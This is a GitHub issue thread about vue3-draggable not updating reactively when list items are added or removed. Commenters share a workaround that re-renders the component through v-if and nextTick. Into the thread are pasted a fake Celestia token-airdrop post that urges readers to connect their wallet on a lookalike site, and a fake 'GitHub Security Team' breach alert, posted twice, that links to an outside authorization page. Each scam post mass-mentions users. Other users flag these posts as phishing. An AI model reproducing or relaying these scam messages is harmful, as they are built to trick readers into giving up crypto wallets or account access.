### ISSUE TITLE
现在新增删除传过去的数据 如何能做成响应式的

### ISSUE THREAD

**Issue by WEBxiyao** [shkilo/vue3-draggable#9]
现在传过去的数据列表想新增一条数据或者删除一条数据 都不能响应式的去更新，只能重新渲染这个组件才能更新，应为setup只走了一次

**Comment by superermiao** [comment]
我也是遇到这个问题

**Comment by agm1984** [comment]
I also encountered this. To solve it, I implemented this custom condition:

```
const isResettingColumns = ref(false);

const handleResetColumns = async () => {
    /**
     * isResettingColumns is a DOM hack to get the Draggable container
     * to reset the value of the v-model. The draggable list does
     * not reset properly without this combination of isResettingColumns
     * and waiting until nextTick.
     */
    isResettingColumns.value = true;
    localColumns.value = cloneDeep(props.defaultColumns);
    await nextTick();
    isResettingColumns.value = false;
};

...

<Draggable v-if="!isResettingColumns" v-model="localColumns" transition="100">
```

This momentarily de-renders the draggable container and re-renders it with different state.

**Comment by wwwossai** [comment]
@agm1984 thanks, it works. Here's my sample codes: 

```vue
<template>
  <draggable v-model="imageList" v-if="imageList.length > 0 && visible">
    <template v-slot:item="{ item }">
      <el-image :src="item" />
    </template>
  </draggable>
</template>

<script>
import Draggable from 'vue3-draggable'
export default {
  components: { Draggable },
  data () {
    return {
      visible: true,
      imageList: []
    }
  },
  methods: {
    async addImage (file) {
      this.imageList.push(...get image link from somewhere...)
      this.visible = false
      this.$nextTick(() => {
        this.visible = true
      })
    }
  }
}
</script>
```

**Comment by keygun-development** [comment]
@agm1984 You should create a pr for this implementation this helped me out after struggling with the package for a while

**Comment by k0ndratov** [comment]
@wwwossai Very grateful for the decision. It helped me.

**Comment by Pappyskull1** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!Creepdog7, @hcnam, @watano, @manuelsc, @int88, @saegist, @ZhiXiao-Lin, @kumavis, @mendesbarreto, @pjendrusik, @gadost, @xenowits, @uijin, @iujakchu, @pfefar, @abc0xmattyic333, @jasonzhouu, @LIGHTYEARS, @3for, @code-ex0

**Comment by akashakki** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
Fooooooooooox, @jintaolee, @imRohan, @shortdoom, @heypoom, @mauuz, @hacker-DOM, @Sawyer-li, @paulschick, @X140Yu, @alonweinstein, @Cryptolibertarian-id, @pedoc, @lewisgibson, @mbsrc, @Jinksi, @LeHoang88, @Atish1010, @titangene, @HCenggel

**Comment by lewisgibson** [comment]
The message above is a phishing attempt. You can report them here https://support.github.com/contact/report-abuse?category=report-abuse&report=akashakki&report_id=26270229&report_type=user

**Comment by akashakki** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
pcaversaccio, @rootulp, @Luphia, @00mjk, @robot-factory, @itirabasso, @codingdrone, @uniquarkD, @xinbenlv, @TheDefiNinja, @king-Alex-d-great, @coolsnake, @Adyfamba, @frankiefab100, @AdrianaDoria, @kananlanginhooper, @yyolk, @wottpal, @Ivangao23, @apravink

**Comment by keygun-development** [comment]
> The message above is a phishing attempt. You can report them here https://support.github.com/contact/report-abuse?category=report-abuse&report=akashakki&report_id=26270229&report_type=user
> 
> @jintaolee, @imRohan, @shortdoom, @heypoom, @mauuz, @hacker-DOM, @Sawyer-li, @paulschick, @X140Yu, @alonweinstein, @Cryptolibertarian-id, @pedoc, @lewisgibson, @mbsrc, @Jinksi, @LeHoang88, @Atish1010, @titangene, @HCenggel

I suppose you ment to report "Pappyskull1"?

**Comment by pedoc** [comment]
Why ping me?

I've been getting some harassment notifications lately, it's very annoying.

**Comment by wottpal** [comment]
> Why ping me?
> 
> I've been getting some harassment notifications lately, it's very annoying.

Just report all of them and send the comment's link in the form as a proof. Got 20+ profiles be taken down in the last month.

**Comment by lewisgibson** [comment]
> > The message above is a phishing attempt. You can report them here https://support.github.com/contact/report-abuse?category=report-abuse&report=akashakki&report_id=26270229&report_type=user
> > @jintaolee, @imRohan, @shortdoom, @heypoom, @mauuz, @hacker-DOM, @Sawyer-li, @paulschick, @X140Yu, @alonweinstein, @Cryptolibertarian-id, @pedoc, @lewisgibson, @mbsrc, @Jinksi, @LeHoang88, @Atish1010, @titangene, @HCenggel
> 
> I suppose you ment to report "Pappyskull1"?

No. `Repository owner deleted a comment [3 days ago](https://github.com/shkilo/vue3-draggable/issues/9#event-11980142954)`. The username is not mentioned because they are already suspended.



> Why ping me?
> 
> I've been getting some harassment notifications lately, it's very annoying.

I pinged everyone in the issue so you don't fall for the very convincing phishing attempt. You're welcome.
